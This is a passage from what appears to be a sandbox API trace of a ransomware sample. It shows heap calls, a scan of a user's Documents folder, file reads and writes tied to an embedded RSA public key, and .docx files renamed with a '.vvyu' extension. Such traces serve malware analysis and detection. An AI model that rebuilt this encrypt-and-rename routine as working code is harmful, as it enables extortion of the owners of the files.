[0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93858 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b20 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b38 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643af0 [0193.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x643b08 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x669ac0 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x643b08 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643af0 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0193.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b08 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b38 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643b20 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e959f8 | out: hHeap=0x620000) returned 1 [0193.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.596] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x17b7c, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x17b7c, lpOverlapped=0x0) returned 1 [0193.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.597] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x17b81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.597] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.598] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.599] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.599] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.599] CloseHandle (hObject=0x568) returned 1 [0193.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0193.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.601] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\D1q0P.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\d1q0p.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\D1q0P.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\d1q0p.docx.vvyu")) returned 1 [0193.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.602] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.605] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0193.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e959f8 [0193.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e959f8 | out: hHeap=0x620000) returned 1 [0193.606] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini") returned=".ini" [0193.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.606] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28786a0, ftCreationTime.dwHighDateTime=0x1d81ec0, ftLastAccessTime.dwLowDateTime=0xf7b486e0, ftLastAccessTime.dwHighDateTime=0x1d84059, ftLastWriteTime.dwLowDateTime=0xf7b486e0, ftLastWriteTime.dwHighDateTime=0x1d84059, nFileSizeHigh=0x0, nFileSizeLow=0xf2a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DIjVxXA4.xlsx", cAlternateFileName="DIJVXX~1.XLS")) returned 1 [0193.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e959f8 [0193.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0193.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e959f8 | out: hHeap=0x620000) returned 1 [0193.607] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\DIjVxXA4.xlsx") returned=".xlsx" [0193.607] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\DIjVxXA4.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\dijvxxa4.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.607] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=62114) returned 1 [0193.607] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.611] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xf27c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.611] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.614] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.614] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xf2a2, lpOverlapped=0x0) returned 1 [0193.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.615] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.615] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.617] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.617] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.617] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.617] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.617] GetLastError () returned 0x0 [0193.617] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.617] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.618] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.618] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.618] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf2a0) returned 0x2ea79b0 [0193.618] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e959f8 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93870 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6581d8 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93858 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x669ac0 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.619] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93840 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x669ac0 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0193.620] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669ac0 | out: hHeap=0x620000) returned 1 [0193.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.622] GetCurrentThreadId () returned 0x66c [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9f380 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.623] GetCurrentThreadId () returned 0x66c [0193.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.624] HeapFree (in: 